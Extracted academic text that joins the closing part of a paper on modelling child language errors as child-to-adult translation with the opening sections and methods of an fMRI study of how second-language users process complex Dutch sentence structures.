1973). To test this hypothesis, we train our model on all children excluding Adam, who alone is responsible for 21% of our sentences. We then test the learned model on the separated Adam 133 Trained on: BLEU WER Adam 72.58 .226 All Others 69.83 .186 Uncorrected 45.54 .278 Table 5: Performance on Adam’s sentences training on other children, versus training on himself. Best perfor- mance under each metric is shown in bold. data. These results are contrasted with performance of 8-fold cross validation training and testing solely on Adam’s utterances. Performance statistics are given in Table 5. We first note that models trained in both scenar- ios lead to large error reductions over the child sen- tences. This provides evidence that our model cap- tures general, and not child-specific, error patterns. Although training exclusively on Adam does lead to increased BLEU score (72.58 vs 69.83), WER is minimized when using the larger volume of train- ing data from other children (.186 vs .226). Taken as a whole, these results suggest that training and testing on separate children does not degrade perfor- mance. This finding supports the general hypothesis of shared developmental paths. Plotting Child Language Errors over Time Af- ter training on annotated data, we predict diver- gences in all available data from the children in Roger Brown’s 1973 study — Adam, Eve and Sarah — as well as Abe (Kuczaj, 1977), a child from a sep- arate study over a similar age-range. We plot each child’s per-utterance frequency of preposition omis- sions in Figure 3. Since we evaluate over 65,000 utterances and reranking has no impact on preposi- tion drop prediction, we skip the reranking step to save computation. In Figure 3, we see that Adam and Sarah’s prepo- sition drops spike early, and then gradually decrease in frequency as their preposition use moves towards that of an adult. Although Eve’s data covers an ear- lier time period, we see that her pattern of prepo- sition drops shows a similar spike and gradual de- crease. This is consistent with Eve’s general lan- guage precocity. Brown’s conclusion — that the lan- guage development of these three children advanced in similar stages at different times — is consistent with our predictions. However, when we examine 18 23 28 33 38 43 48 53 58 0 0.02 0.04 0.06 0.08 0.1 0.12 0.14 Adam Eve Sarah Abe Age (Months) P e r- U tt e ra n c e F re q u e n c y Figure 3: Automatically detected preposition omissions in un-annotated utterances from four children over time. Assuming perfect model predictions, frequencies are ±.002 at p = .05 under a binomial normal approxima- tion interval. Prediction error is given in Table 4. Abe we do not observe the same pattern.7 This points to a degree of variance across children, and suggests the use of our model as a tool for further empirical refinement of language development hy- potheses. Discussion Our error correction system is de- signed to be more constrained than a full-scale MT system, focusing parameter learning on errors that are known to be common to child language learn- ers. Reorderings are prohibited, lexical word swaps are limited to inflectional changes, and deletions are restricted to function word categories. By highly re- stricting our hypothesis space, we provide an induc- tive bias for our model that matches the child lan- guage domain. This is particularly important since the size of our training set is much smaller than that usually used in MT. Indeed, as Figure 2 shows, very little data is needed to achieve good performance. In contrast, the ESL baseline suffers because its generative model is too restricted for the domain of transcribed child language. As shown above in Table 4, child deletions of function words are the most frequent error types in our data. Since the ESL model does not capture word deletions, and has a more restricted notion of word swaps, 88% of child sentences in our training corpus cannot be translated to their reference adult versions. The result is that the ESL model tends to rely too heavily on the lan- guage model. For example, on the sentence “I com- 7Though it is of course possible that a similar spike and drop-off occurred earlier in Abe’s development. 134 ing to you,” the ESL model improves n-gram prob- ability by producing “I came to you” instead of the correct “I am coming to you”. This increases error over the child sentence itself. In addition to the domain-specific generative model, our approach has the advantage of long- range syntactic information encoded by reranking features. Although the perceptron algorithm places high weight on the generative model probability, it alters the predictions in 17 out of 201 test sentences, in all cases an improvement. Three of these rerank- ing changes add a noun subject, five enforce ques- tion structure, and nine add a main verb. 7 Conclusion and Future Work In this paper we introduce a corpus of divergent child sentences with corresponding adult forms, en- abling the systematic computational modeling of child language by relating it to adult grammar. We propose a child-to-adult translation task as a means to investigate child language development, and pro- vide an initial model for this task. Our model is based on a noisy-channel assump- tion, allowing for the deletion and corruption of in- dividual words, and is trained using FST techniques. Despite the debatable cognitive plausibility of our setup, our results demonstrate that our model cap- tures many standard divergences and reduces the average error of child sentences by approximately 20%, with high performance on specific frequently occurring error types. The model allows us to chart aspects of language development over time, without the need for addi- tional human annotation. Our experiments show that children share common developmental stages in lan- guage learning, while pointing to child-specific sub- tleties in preposition use. In future work, we intend to dynamically model child language ability as it grows and shifts in re- sponse to internal processes and external stimuli. We also plan to develop and train models specializ- ing in the detection of specific error categories. By explicitly shifting our model’s objective from child- adult translation to the detection of some particular error, we hope to improve our analysis of child di- vergences over time. Acknowledgments The authors thank the reviewers and acknowledge support by the NSF (grant IIS-1116676) and a re- search gift from Google. Any opinions, findings, or conclusions are those of the authors, and do not nec- essarily reflect the views of the NSF. References A. Alishahi. 2010. Computational modeling of human language acquisition. Synthesis Lectures on Human Language Technologies, 3(1):1–107. C. Allauzen, M. Riley, J. Schalkwyk, W. Skut, and M. Mohri. 2007. OpenFst: A general and efficient weighted finite-state transducer library. Implementa- tion and Application of Automata, pages 11–23. R.H. Baayen, R. Piepenbrock, and L. Gulikers. 1996. CELEX2 (CD-ROM). Linguistic Data Consortium. E. Bates, I. Bretherton, and L. Snyder. 1988. From first words to grammar: Individual differences and disso- ciable mechanisms. Cambridge University Press. D.C. Bellinger and J.B. Gleason. 1982. Sex differences in parental directives to young children. Sex Roles, 8(11):1123–1139. L. Bliss. 1988. The development of modals. Journal of Applied Developmental Psychology, 9:253–261. L. Bloom, L. Hood, and P. Lightbown. 1974. Imitation in language development: If, when, and why. Cognitive Psychology, 6(3):380–420. L. Bloom, P. Lightbown, L. Hood, M. Bowerman, M. Maratsos, and M.P. Maratsos. 1975. Structure and variation in child language. Monographs of the Soci- ety for Research in Child Development, pages 1–97. L. Bloom. 1973. One word at a time: The use of single word utterances before syntax. Mouton. P. Bloom. 1990. Subjectless sentences in child language. Linguistic Inquiry, 21(4):491–504. J.N. Bohannon III and A.L. Marquis. 1977. Chil- dren’s control of adult speech. Child Development, 48(3):1002–1008. R. Brown. 1973. A first language: The early stages. Harvard University Press. V. Carlson-Luden. 1979. Causal understanding in the 10-month-old. Ph.D. thesis, University of Colorado at Boulder. E.C. Carterette and M.H. Jones. 1974. Informal speech: Alphabetic & phonemic texts with statistical analyses and tables. University of California Press. M. Chodorow and C. Leacock. 2000. An unsupervised method for detecting grammatical errors. In Proceed- ings of the North American Chapter of the Association for Computational Linguistics, pages 140–147. 135 M. Collins and B. Roark. 2004. Incremental parsing with the perceptron algorithm. In Proceedings of the Asso- ciation for Computational Linguistics, pages 111–118, Barcelona, Spain, July. M. Connor, Y. Gertner, C. Fisher, and D. Roth. 2008. Baby SRL: Modeling early language acquisition. In Proceedings of the Conference on Computational Nat- ural Language Learning, pages 81–88. R. Dale and A. Kilgarriff. 2011. Helping our own: The HOO 2011 pilot shared task. In Proceedings of the Eu- ropean Workshop on Natural Language Generation, pages 242–249. M.C. de Marneffe, B. MacCartney, and C.D. Manning. 2006. Generating typed dependency parses from phrase structure parses. In Proceedings of The In- ternational Conference on Language Resources and Evaluation, volume 6, pages 449–454. M.J. Demetras, K.N. Post, and C.E. Snow. 1986. Feed- back to first language learners: The role of repetitions and clarification questions. Journal of Child Lan- guage, 13(2):275–292. M.J. Demetras. 1989. Working parents’ conversational responses to their two-year-old sons. M. Dreyer, J.R. Smith, and J. Eisner. 2008. Latent- variable modeling of string transductions with finite- state methods. In Proceedings of the Conference on Empirical Methods in Natural Language Processing, pages 1080–1089. A. Echihabi and D. Marcu. 2003. A noisy-channel ap- proach to question answering. In Proceedings of the Association for Computational Linguistics, pages 16– 23. J. Eisner. 2001. Expectation semirings: Flexible EM for learning finite-state transducers. In Proceedings of the ESSLLI workshop on finite-state methods in NLP. M. Gamon. 2011. High-order sequence modeling for language learner error detection. In Proceedings of the Workshop on Innovative Use of NLP for Building Ed- ucational Applications, pages 180–189. L.C.G. Haggerty. 1930. What a two-and-one-half-year- old child said in one day. The Pedagogical Seminary and Journal of Genetic Psychology, 37(1):75–101. W.S. Hall, W.C. Tirre, A.L. Brown, J.C. Campoine, P.F. Nardulli, HO Abdulrahman, MA Sozen, W.C. Schno- brich, H. Cecen, J.G. Barnitz, et al. 1979. The communicative environment of young children: Social class, ethnic, and situational differences. Bulletin of the Center for Children’s Books, 32:08. W.S. Hall, W.E. Nagy, and R.L. Linn. 1980. Spoken words: Effects of situation and social group on oral word usage and frequency. University of Illinois at Urbana-Champaign, Center for the Study of Reading. W.S. Hall, W.E. Nagy, and G. Nottenburg. 1981. Sit- uational variation in the use of internal state words. Technical report, University of Illinois at Urbana- Champaign, Center for the Study of Reading. H. Hamburger and S. Crain. 1984. Acquisition of cogni- tive compiling. Cognition, 17(2):85–136. R.P. Higginson. 1987. Fixing: Assimilation in language acquisition. University Microfilms International. M.H. Jones and E.C. Carterette. 1963. Redundancy in children’s free-reading choices. Journal of Verbal Learning and Verbal Behavior, 2(5-6):489–493. P. Koehn, H. Hoang, A. Birch, C. Callison-Burch, M. Federico, N. Bertoldi, B. Cowan, W. Shen, C. Moran, R. Zens, et al. 2007. Moses: Open source toolkit for statistical machine translation. In Proceed- ings of the Association for Computational Linguis- tics (Interactive Poster and Demonstration Sessions), pages 177–180. S. A. Kuczaj. 1977. The acquisition of regular and irreg- ular past tense forms. Journal of Verbal Learning and Verbal Behavior, 16(5):589–600. J. Lee and S. Seneff. 2006. Automatic grammar cor- rection for second-language learners. In Proceedings of the International Conference on Spoken Language Processing. X. Lu. 2009. Automatic measurement of syntactic com- plexity in child language acquisition. International Journal of Corpus Linguistics, 14(1):3–28. B. MacWhinney. 2000. The CHILDES project: Tools for analyzing talk, volume 2. Psychology Press. B. MacWhinney. 2007. The TalkBank project. Cre- ating and digitizing language corpora: Synchronic Databases, 1:163–180. M. Mohri. 2008. System and method of epsilon removal of weighted automata and transducers, June 3. US Patent 7,383,185. E. Morley and E. Prud’hommeaux. 2012. Using con- stituency and dependency parse features to identify er- rorful words in disordered language. In Proceedings of the Workshop on Child, Computer and Interaction. A. Ninio, C.E. Snow, B.A. Pan, and P.R. Rollins. 1994. Classifying communicative acts in children’s interactions. Journal of Communication Disorders, 27(2):157–187. F.J. Och and H. Ney. 2003. A systematic comparison of various statistical alignment models. Computational Linguistics, 29(1):19–51. F.J. Och. 2003. Minimum error rate training in statistical machine translation. In Proceedings of the Association for Computational Linguistics, pages 160–167. R.E. Owens. 2008. Language development: An intro- duction. Pearson Education, Inc. 136 K. Papineni, S. Roukos, T. Ward, and W.J. Zhu. 2002. BLEU: a method for automatic evaluation of machine translation. In Proceedings of the Association for Computational Linguistics, pages 311–318. Y.A. Park and R. Levy. 2011. Automated whole sentence grammar correction using a noisy channel model. Pro- ceedings of the Association for Computational Lin- guistics, pages 934–944. A.M. Peters. 1987. The role of imitation in the devel- oping syntax of a blind child in perspectives on repeti- tion. Text, 7(3):289–311. K. Post. 1992. The language learning environment of laterborns in a rural Florida community. Ph.D. thesis, Harvard University. C. Quirk, C. Brockett, and W. Dolan. 2004. Monolin- gual machine translation for paraphrase generation. In Proceedings of the Conference on Empirical Methods in Natural Language Processing, pages 142–149. T. Regier. 2005. The emergence of words: Attentional learning in form and meaning. Cognitive Science, 29(6):819–865. A. Ritter, C. Cherry, and W.B. Dolan. 2011. Data-driven response generation in social media. In Proceedings of the Conference on Empirical Methods in Natural Language Processing, pages 583–593. B. Roark, R. Sproat, C. Allauzen, M. Riley, J. Sorensen, and T. Tai. 2012. The OpenGrm open-source finite- state grammar software libraries. In Proceedings of the Association for Computational Linguistics (System Demonstrations), pages 61–66. A. Rozovskaya, M. Sammons, J. Gioja, and D. Roth. 2011. University of Illinois system in HOO text cor- rection shared task. In Proceedings of the European Workshop on Natural Language Generation, pages 263–266. J. Sachs. 1983. Talking about the there and then: The emergence of displaced reference in parent-child dis- course. Children’s Language, 4. K. Sagae, A. Lavie, and B. MacWhinney. 2005. Auto- matic measurement of syntactic development in child language. In Proceedings of the Association for Com- putational Linguistics, pages 197–204. S. Sahakian and B. Snyder. 2012. Automatically learn- ing measures of child language development. Pro- ceedings of the Association for Computational Lin- guistics (Volume 2: Short Papers), pages 95–99. C.E. Snow, F. Shonkoff, K. Lee, and H. Levin. 1986. Learning to play doctor: Effects of sex, age, and ex- perience in hospital. Discourse Processes, 9(4):461– 473. E.L. Stine and J.N. Bohannon. 1983. Imitations, inter- actions, and language acquisition. Journal of Child Language, 10(03):589–603. X. Sun, J. Gao, D. Micol, and C. Quirk. 2010. Learning phrase-based spelling error models from clickthrough data. In Proceedings of the Association for Computa- tional Linguistics, pages 266–274. P. Suppes. 1974. The semantics of children’s language. American Psychologist, 29(2):103. T.Z. Tardif. 1994. Adult-to-child speech and language acquisition in Mandarin Chinese. Ph.D. thesis, Yale University. V. Valian. 1991. Syntactic subjects in the early speech of American and Italian children. Cognition, 40(1-2):21– 81. L. Van Houten. 1986. Role of maternal input in the acquisition process: The communicative strategies of adolescent and older mothers with their language learning children. In Boston University Conference on Language Development. A. Warren-Leubecker and J.N. Bohannon III. 1984. Into- nation patterns in child-directed speech: Mother-father differences. Child Development, 55(4):1379–1385. A. Warren. 1982. Sex differences in speech to children. Ph.D. thesis, Georgia Institute of Technology. B. Wilson and A.M. Peters. 1988. What are you cookin’ on a hot?: A three-year-old blind child’s ‘violation’ of universal constraints on constituent movement. Lan- guage, 64:249–273. 137 138 work_lqd6yi6rlndzlkg35we4ycufqa ---- BRAIN-2015-0383-ver9-Weber_4P 345..355 Overlap and Differences in Brain Networks Underlying the Processing of Complex Sentence Structures in Second Language Users Compared with Native Speakers Kirsten Weber, 1,2 Lisa Luther, 2 Peter Indefrey, 2,3 and Peter Hagoort 1,2 Abstract When we learn a second language later in life, do we integrate it with the established neural networks in place for the first language or is at least a partially new network recruited? While there is evidence that simple grammatical structures in a second language share a system with the native language, the story becomes more multifaceted for complex sentence structures. In this study, we investigated the underlying brain networks in native speakers com- pared with proficient second language users while processing complex sentences. As hypothesized, complex structures were processed by the same large-scale inferior frontal and middle temporal language networks of the brain in the second language, as seen in native speakers. These effects were seen both in activations and task-related connectivity patterns. Furthermore, the second language users showed increased task-related con- nectivity from inferior frontal to inferior parietal regions of the brain, regions related to attention and cognitive control, suggesting less automatic processing for these structures in a second language. Key words: activation; bilingualism; connectivity; fMRI; language; PPI; syntax Introduction When we learn a second language later in life, wealready have an entire first language system in place. There is an established system, a brain network, for process- ing sounds, words, and sentences in this language. As we start learning a second language, it is intuitively plausible that we recruit parts of the same brain network that is already established for the first language. Indeed most meta-analysis studies on second language processing in the brain confirm this idea (Indefrey, 2006) at least if participants are proficient in their second language (Sebastian et al., 2011). These stud- ies largely focused on simple sentence structures that overlap in structure with those in the first language. However, we know less about the networks engaged in processing com- plex structures and especially those structures that have no direct correspondents in the first language. A structure that does not exist in the same form in the first language cannot be tested across languages in the same sub- jects. In this study, we therefore compared the processing of complex sentence structures in a group of second language users to a group of native speakers of Dutch. We investigated two types of complex sentence structures, one that existed in the first language of the second language user group (a right- branching structure) and one that did not (a crossed depen- dency structure). Crossed dependencies (Fig. 1A) are complex sentence structures that are infrequent in their appearance across the languages of the world, Dutch and Swiss–German being among the few. In standard German, a nested dependency structure would be used instead (Fig. 1C). These sentences look very similar: both have nonlocal dependencies and only the final verbs appear to be swapped. Nonetheless, lin- guistically, they belong to different types of syntactic classes (Nowak et al., 2002). The crossed dependency structure is generated by context-sensitive grammars, while the nested dependency structure is generated by the lower class of context-free grammars. Psycholinguists have discovered dif- ferences in the processing of these structures (Bach et al., 1986; Kaan and Vasić, 2004). However, contrary to the lin- guistic hierarchy, the crossed dependencies appear to be eas- ier to process than the nested dependency structures. Therefore, both from a linguistic and a psycholinguistic per- spective, crossed dependency structures are different from nested dependency structures in their syntactic structure, while the meaning conveyed is similar. 1 Max Planck Institute for Psycholinguistics, Nijmegen, The Netherlands. 2 Donders Centre for Cognitive Neuroimaging, Donders Institute for Brain, Cognition and Behaviour, Radboud University Nijmegen, Nijmegen, The Netherlands. 3 Department of Linguistics, Heinrich-Heine University, Duesseldorf, Germany. BRAIN CONNECTIVITY Volume 6, Number 4, 2016 ª Mary Ann Liebert, Inc. DOI: 10.1089/brain.2015.0383 345 The processing of crossed dependencies in second lan- guage speakers is thus an interesting test bed to investigate how these later learned complex structures are processed in the brain. Right-branching sentence structures (Fig. 1B, D) on the other hand are structures with a similar meaning to the sentences in Figure 1A and C, but with an equivalent structure across the two languages. Moreover, while still complex structures, they are thought to be easier to process than embedded structures (Stromswold et al., 1996). While crossed dependencies do not exist in German, Ger- man native speakers can nonetheless acquire and understand these structures rapidly, even in adulthood (Davidson and Indefrey, 2009; Uddén et al., 2012), as evidenced by behav- ioral and electrophysiological measures. Accordingly, one might assume that the same hemodynamic effects should be found whether the structure is processed by a first lan- guage speaker or second language user. In the initial analysis of the present dataset published in Weber’s PhD thesis (2012), syntactic hemodynamic repetition effects of crossed dependency structures in a first language speaker group were compared with the repetition effects of the same structures in a second language (L2) user group. This analysis showed subtle differences in the repetition ef- fects between the two groups. However, these effects, while different across groups (the native speaker group showed a repetition enhancement effect and not the expected repetition suppression effect, while the German group did not), were not in the expected direction and moreover very subtle, only pres- ent in a region of interest analysis (focusing on the left inferior frontal gyrus and left and right temporal cortex). While this hints at a slightly different organization of the processing systems within the same brain regions, in the pres- ent analysis, we were interested in figuring out whether the overall brain activation patterns and networks differed across the two groups. More specifically, we were interested in dis- covering whether the overall language network was larger in the L2 user group or whether the networks completely overlap at the whole-brain level. In this article, we thus report a com- plementary classic activation and functional connectivity analysis of this dataset to elucidate whether differences in he- modynamic responses between the two groups are confined to the core regions of the language network or whether the lan- guage network is organized differently for processing the same language as an L1 or as an L2. According to some theories, later learned syntactic struc- tures should at least initially be processed by a different brain network. Ullman (2001a) proposed that L2 speakers rely more on a declarative system to process the second lan- guage, while L1 processing is more procedural. Two differ- ent neural networks, that is, a left frontotemporal and a frontostriatal network are proposed to underlie these pro- cesses, respectively (Ullman, 2001b). Both are claimed to in- volve Broca’s area (Ullman, 2006). Others propose that while the overall network for gram- matical processing is very similar for the first and second lan- guage, there are activation differences. Namely, L2 speakers engage more regions if the L2 was acquired later in life and specifically if they are less proficient in the L2. This pertains especially to regions related to cognitive control, such as those regions related to suppressing interfering lexical or syntactic representations from the other language (Abutalebi et al., 2008; Green and Abutalebi, 2013). Other accounts sug- gest differences in the processing of local and nonlocal de- pendencies (Clahsen and Felser, 2006; Dallas and Kaan, 2008). In case of local dependencies, L2 grammatical pro- cessing can become native-like. However, the processing of complex syntax, such as nonlocal dependencies, might differ (Clahsen and Felser, 2006). Yet, others claim that the same brain network processes both the first and the second language (Consonni et al., 2013; Indefrey, 2006; Luke et al., 2002; Perani et al., 1998). As indicated previously, stronger evidence for a shared syntactic system between L1 and L2 comes from a repetition suppression study in German–English late bilin- guals (Weber and Indefrey, 2009). The study showed that an English passive can be primed by a German passive on both the neural and the behavioral levels. Therefore, it was argued that the same neuronal populations were recruited in the processing of the L1 and the L2 passive. Similar be- havioral effects in language production have been found in Spanish–English and Dutch–English bilinguals (Hartsuiker et al., 2004; Schoonbaert et al., 2007). Most of these studies focused on sentences with simple local dependencies. It is thus an open question whether advanced second language users process these later learned complex structures like na- tive speakers or whether they rely on different processes and representations. In the past, functional neuroimaging studies of language processing have focused on activation studies alone, trying to investigate where a certain cognitive function is localized. However, this approach does not take the dynamic inter- play between regions during cognitive tasks into account FIG. 1. Examples of complex sentence structures in German and Dutch and the dependencies be- tween verbs and arguments. The structures in (A, B) are used in the present study. The structure in (A) does not exist in standard German and an embedded structure, see (C), is possible instead; (B, D) on the other hand are equivalent in Ger- man and Dutch. All sentences mean ‘‘Jan taught Anna to feed the horses.’’ 346 WEBER ET AL. (Hagoort, 2014). Therefore, investigations of functional, task-related connectivity patterns are an important addition to elucidate the large-scale networks underlying language processing. Recent studies have shown the dynamic interplay between inferior frontal and temporal regions during lan- guage processing (den Ouden et al., 2012; Griffiths et al., 2013; Snijders et al., 2010). The left inferior frontal and temporal regions of the brain are thought to form the core network related to sentence and especially syntactic processing as described by several dif- ferent theories (e.g., Grodzinsky and Friederici, 2006; Hagoort, 2005) and as evidenced, for example, by syntactic priming studies ( Menenti et al., 2011; Segaert et al., 2012). This functional organization appears to be realized across different languages, in closely related languages such as Ger- man and Dutch, as well as in less related languages such as Japanese, Chinese, and Hebrew (see e.g., the studies listed in the supplementary materials of a recent meta-analysis of sentence-level processing, Hagoort and Indefrey, 2014). In the present study, we are going to investigate the language networks of native speakers and second language users and in- vestigate, with activation and connectivity analyses of func- tional magnetic resonance imaging (fMRI) data, whether the networks overlap between the two groups. Moreover, we are going to explore whether there are any overall group differ- ences in activation and connectivity patterns and, more specif- ically, whether there are any network differences between the two groups for the processing of crossed dependency struc- tures, the structure that does not exist in the first language of the second language user group (in comparison with the right-branching structure that does occur in both languages). We expect these differences to show up in the form of and increased engagement of the brain networks in L2 process- ing, in the sense of more activation and more connectivity (either in the form of additional network nodes or stronger connections) within the underlying networks. These differ- ences might occur within the traditional language networks thought to underlie sentence and, in particular, syntactic pro- cessing (i.e., left inferior frontal and left middle temporal cortex), which would indicate differences in the nature of the second language networks, or in other nontraditional re- gions that are, for example, linked to cognitive control mech- anisms on the language network (such as prefrontal or parietal regions of the brain). Materials and Methods Participants We tested 24 Dutch native speakers (15 females) and 28 German native speakers (18 females). Four of the German participants (three females) were subsequently excluded as they did not meet our criteria concerning their language background or due to technical malfunction during scanning. One Dutch native speaker was excluded from the analyses as the condition triggers were not recorded correctly. The Ger- man native speakers all went to university in The Nether- lands and had started learning Dutch after the age of 18. They had all passed the Dutch NT2 staatsexamen, a language test that allows university entry and shows a high-proficiency level in Dutch. All participants were right-handed and had no history of neurological impairments. They all had normal or corrected-to-normal vision. The participants received course credits or money for their participation in the experiment. All participants gave written informed consent before the study started and the study was conducted according to institu- tional guidelines of the local ethics committee (CMO proto- col region Arnhem-Nijmegen, The Netherlands) and in accordance with the Declaration of Helsinki. Stimuli and experimental design The experimental stimuli consisted of crossed dependency sentences and right-branching structures with similar seman- tic content (Fig. 1A, B). The study was originally designed as a syntactic priming experiment in which crossed dependency structures were primed (syntactic priming trial: prime: crossed dependency structure, target: crossed dependency structure; no syntactic priming trial: prime: right-branching structure, target: crossed dependency structure). This was fully crossed with a verb repetition manipulation. The main verbs used in the sentences were helpen (to help) and leren (to teach) (crossed dependency structures in Dutch are re- stricted to a very limited set of main verbs [Zwart, 1996] and we thus used only two). Instead of comparing target sentences as in the original analysis, here we look at the orthogonal contrasts of crossed dependency and right-branching prime sentences. Given the design, we thus have equal numbers (52) of crossed depen- dency and right-branching sentences and an even distribution of the two verbs. The original description of the design can be found in Weber (2012). Moreover, to hide the priming manipulation and make the sentences less predictable, an equivalent amount of passive and active filler trials, as well as right-branching filler trials, was also presented to the par- ticipant interspersed with the priming trials. As a baseline condition, miniblocks of, in total, 64 sentence format conso- nant strings after every 20 sentences were presented as well. Four stimulus lists were created. Across these stimulus lists, each target occurred in a prime and a no-prime trial and each sentence’s content appeared in the prime as well as target po- sition. Each participant was presented with only one of the stimulus lists. The experiment consisted of three experimen- tal sessions; participants had a short break between sessions. Right-branching and crossed dependency sentences are not equal in numbers of words as the right-branching sen- tence has an additional word, te (Fig. 1). Moreover, an addi- tional manipulation of the sentences that was originally conceived to ensure that syntactic priming effects cannot be explained by overlap in length between crossed depen- dency sentences, but no overlap with right-branching sen- tences, introduced an additional adjective in the second noun phrase of right-branching sentences (thus making these always 11 words long) as well as in the crossed depen- dency target sentences (thus 10 words long). No additional adjectives were introduced in crossed dependency prime sen- tences; these were thus nine words long. Thus, our present comparison between right-branching and crossed dependency structures is confounded by length (9 versus 11 words) and additional adjectives in one condi- tion. However, given our hypothesis, we are only interested in the interaction between participant group and type of structure as well as the main difference between groups, con- trasts that should only be affected by this confound between the type of structures if the sentence length per se was pro- cessed differently in the two groups, which is unlikely. BRAIN NETWORKS IN SECOND LANGUAGE USERS 347 fMRI experimental procedure The experiments were run using Presentation software (Neurobehavioral Systems, www.neuro-bs.com). Partic- ipants lay in the scanner and looked at a screen through a mirror. Sentences were presented in white Arial font of size 22 on a black background and participants were instructed to read the sentences silently in their head. Crossed dependency sentences were presented in these fragments: ‘‘De muzikant/ heeft/de tiener/de fluit/leren/spelen’’ (The musician has the teenager the flute teach play.) and right-branching sentences in these: ‘‘De muzikant/heeft/de tiener/geleerd/de fluit/te spelen’’ (The musician has the teenager taught the flute to play.). Sentence fragments were presented one by one at a fixed presentation rate that depended on the length of the fragment, both right-branching and crossed dependency sentences were presented in six fragments (while the number of words differed, see previous section). The fragment duration in msec was computed as ([number of letters in the fragment ·30 msec] +190 msec), a method based on Nieuwland and Van Berkum (2006). During the in- terstimulus interval (between sentences), a fixation cross was displayed. The length of the interval was jittered between 1.1 and 3.3 sec. In 13.3% of the nontarget experimental sen- tences and one third of the filler sentences, a word appeared in a larger 30 font size; these trials were not included in the current analysis. Subjects had to respond to this change by pressing a button. fMRI data acquisition and analysis The fMRI data were acquired on a 1.5 Tesla Siemens Avanto scanner. A functional T2*-weighted EPI-BOLD fMRI scan was performed (TR = 2.35 sec, TE = 40 msec), with a flip angle of 90�. We acquired 33 slices with a voxel size of 3.5 · 3.5 · 3 mm with a 0.5-mm gap. The field of view was 224 · 224 · 115.5 mm. The slices were acquired in an ascending order. It was made sure that the field of view included inferior parts of frontal and temporal cortex. In some subjects, parts of the top of the brain were outside the field of view. The anatomical images were acquired using a T1-weighted sequence. The fMRI data were prepro- cessed and analyzed at the first level using SPM5 (www.fil.ion.ucl.ac.uk/spm/). Second-level analyses were run using SPM8. The first five images were discarded to ensure that transient nonsaturation effects did not affect the analysis. The functional images were checked for spikes and if any were detected these images were removed and a replacement image was created based on the surrounding images. All functional images were real- igned and slice-time corrected. The participants’ anatomical T1 images were coregistered to the mean functional image. The anatomical T1 images were then segmented into gray and white matter and the spatial normalization parameters were taken to normalize the functional images. Functional images were smoothed with a 10-mm full-width at half max- imum Gaussian kernel. For the fMRI activation analysis, we first defined the con- trasts of interest for each subject. These were then taken to the second level for a random-effects group analysis. Con- nectivity analyses were run using the generalized psycho- physiological interaction (gPPI) toolbox ( McLaren et al., 2012). As for the activation analysis, as per psychophysio- logical interaction analysis (thus per seed), we first defined the contrasts of interest for each subject. These were then taken to the second level for a random-effects group analysis. First-level single-subject model activation For the activation analyses, we created a design matrix for each participant that included for each of the three sessions, regressors for each type of sentence structure and the sentence format consonant strings, as well as the fixation cross. The ac- tual event duration was modeled and realignment parameters for movement correction were added to the model. In addition, additional regressors were entered to covary for excessive movement at time points where composite motion was >1 mm. These covariates were created using the ART toolbox ( Mozes and Whitfield-Gabrieli, 2011; www.nitrc.org/ projects/artifact_detect/). On average, the additional regres- sors were added for <3% of the time points. We then defined three different contrasts per subject, the crossed dependency sentences, the right-branching sentences, and both these complex sentence structures, all against the baseline of sen- tence format consonant strings. These contrasts were taken to the second level for a random-effects group analysis. First-level single-subject model connectivity We also carried out task-related connectivity analyses from seeds that were defined based on second-level activa- tion analyses. More specifically, based on the first six peaks of activation from the conjunction of complex sen- tences across the two groups (Table 1), we defined 10-mm spheres that were used as seeds for a gPPI analysis ( McLaren et al., 2012). These seeds were located in the left inferior frontal gyrus, left temporal pole, left anterior middle tempo- ral gyrus, left middle temporal gyrus, left posterior middle temporal gyrus, and left inferior temporal gyrus. For each seed region and subject, we built a design matrix consisting of the following regressors: (1) regressors for each condition, mirroring the activation model; (2) a regressor for the overall activity in the seed region; and (3) regressors de- scribing the modulation of activity from the seed region to the rest of the brain for each of the conditions (psychophys- iological interactions). Moreover, the same regressors for movement correction as for the activation models were used. The actual event duration was modeled. We again de- fined three different contrasts of interests to be taken into the second-level group analysis: the modulation of activity from the seed region for crossed dependency sentences, right- branching sentences, and both complex sentences against sentence format consonant strings. Second-level model activation To investigate overlap and differences in activation pat- terns between the two groups, we built two different second- level models. First, we built a flexible factorial model with the factors group (second language user; native speaker), type of sentences (crossed dependency or right branching), and subject in which we modeled both main effects and the interaction. Second, a simple between-groups t-test com- pared complex sentences versus sentence format consonant strings across the two groups. This was built as an additional model to be able to look at the main effect of the group, which is not correctly estimated in the flexible factorial 348 WEBER ET AL. Table 1. Activation and Connectivity Effects of the Conjunction of Sentences Versus Consonant Strings Contrast Between the Two Groups Region Cluster size x/y/z BA area pFWE (cluster) pFWE (peak) T45 Activations Left middle temporal gyrus a 7725 �66 �40 8 21/22 0.000 0.000 27.48 Left middle temporal gyrus (anterior) a �62 �6 �10 21 0.000 25.47 Left medial temporal pole a �44 12 �20 38 0.000 16.31 Left inferior temporal gyrus a �38 �12 �28 20 0.000 15.19 Left middle temporal gyrus (posterior) a �44 �52 18 21 0.000 13.15 Left inferior frontal gyrus orbitalis/triangularis a �46 28 �4 45/47 0.000 10.11 Left hippocampus �24 �24 �12 0.000 8.42 Left fusiform gyrus �38 �38 �18 37 0.000 7.49 Left rolandic operculum �62 0 14 6 0.000 7.3 Left inferior frontal gyrus triangularis �58 24 16 45 0.000 6.82 Left superior temporal gyrus �48 �32 24 41 0.01 5.79 Left insula �34 �18 14 0.114 4.89 Right middle temporal gyrus 573 62 0 �14 21 0.000 0.000 9.93 Right middle temporal pole 48 18 �26 38 0.000 7.10 Right middle/superior temporal gyrus 52 �14 �2 22 0.462 4.27 Right (para)hippocampal gyrus 417 22 �14 �16 35 0.000 0.000 9.82 Left cerebellum 373 �6 �50 0 0.000 0.000 8.90 Left precentral gyrus 151 �52 �6 46 6 0.000 0.000 8.68 Left calcarine gyrus 235 �2 �94 14 18 0.000 0.001 6.77 Cuneus 0 �86 36 19 0.073 5.06 Right cerebellum 25 18 �82 �38 0.004 0.003 6.20 Right precentral gyrus 17 60 �8 46 6 0.008 0.007 5.90 (1) Connectivity from left inferior frontal gyrus Left anterior superior temporal gyrus/left temporal pole 78 �54 2 �8 38 0.029 0.005 6.07 Left inferior occipital gyrus 115 �26 �88 �8 18 0.009 0.015 5.73 Right inferior frontal cortex/insula 77 32 28 14 0.030 0.076 5.14 Left fusiform gyrus 79 �42 �60 �10 37 0.028 0.163 4.84 (2) Connectivity from left temporal pole Cerebellar vermis (lobule VI) 77 2 �78 �20 0.028 0.198 4.78 Left lingual gyrus �16 �84 �10 18 0.601 4.23 (3) Connectivity from 